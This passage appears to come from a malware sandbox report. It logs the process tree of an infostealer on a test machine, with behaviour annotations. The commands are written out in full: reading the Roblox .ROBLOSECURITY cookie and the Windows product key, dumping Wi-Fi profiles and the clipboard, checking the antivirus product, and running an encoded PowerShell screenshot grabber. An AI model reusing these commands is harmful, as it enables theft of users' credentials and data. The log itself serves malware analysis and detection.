      PID:3576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:2520
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:448
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:5052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2892
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1696
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:1700
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:2616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:2424
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:1620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4468
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3036
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3992
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:5108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:3648
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:4352
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:1112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:1728
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      PID:2940
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ckoeswgl\ckoeswgl.cmdline"
        5⤵
        
        PID:3456
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4522.tmp" "c:\Users\Admin\AppData\Local\Temp\ckoeswgl\CSC6CB7A4FB3C31406497B876E9636F41F7.TMP"
        6⤵
        
        PID:228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1412
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4124
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:3596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1584
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:3888
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:2340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3688
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2304
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1224
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:448
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3688
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4368
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      PID:3580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:736
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:4988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI14482\rar.exe a -r -hp"Trolgang77" "C:\Users\Admin\AppData\Local\Temp\1ufbA.zip" *"
    3⤵
    PID:3452
  - - C:\Users\Admin\AppData\Local\Temp\_MEI14482\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI14482\rar.exe a -r -hp"Trolgang77" "C:\Users\Admin\AppData\Local\Temp\1ufbA.zip" *
      4⤵
      Executes dropped EXE
      PID:5020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:3892
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:2112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:3408
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:4516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4188
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:4908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:1116
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1200
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:2940
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      PID:1620

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2424
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffe0837cc40,0x7ffe0837cc4c,0x7ffe0837cc58
  2⤵
  PID:4156
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1888,i,17895097660136467640,8182578438270595067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1880 /prefetch:2
  2⤵
  PID:2460
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2172,i,17895097660136467640,8182578438270595067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2168 /prefetch:3
  2⤵
  PID:3892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,17895097660136467640,8182578438270595067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2420 /prefetch:8
  2⤵
  PID:1584
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,17895097660136467640,8182578438270595067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3172 /prefetch:1
  2⤵
  PID:2900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3328,i,17895097660136467640,8182578438270595067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3268 /prefetch:1
  2⤵
  PID:5108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4608,i,17895097660136467640,8182578438270595067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3728 /prefetch:1
  2⤵
  PID:1728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4740,i,17895097660136467640,8182578438270595067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4916 /prefetch:8
  2⤵
  PID:3280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4936,i,17895097660136467640,8182578438270595067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4920 /prefetch:8
  2⤵
  PID:2304
- C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --reenable-autoupdates --system-level
  2⤵
  - Drops file in Program Files directory
  PID:1896
- - C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0x7ff70c374698,0x7ff70c3746a4,0x7ff70c3746b0
    3⤵
    - Drops file in Program Files directory
    PID:3864
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5176,i,17895097660136467640,8182578438270595067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4368 /prefetch:8
  2⤵
  PID:2392
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5320,i,17895097660136467640,8182578438270595067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5328 /prefetch:8
  2⤵
  PID:3588
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4980,i,17895097660136467640,8182578438270595067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5184 /prefetch:8
  2⤵
  PID:2316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5316,i,17895097660136467640,8182578438270595067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4896 /prefetch:8
  2⤵
  PID:3752
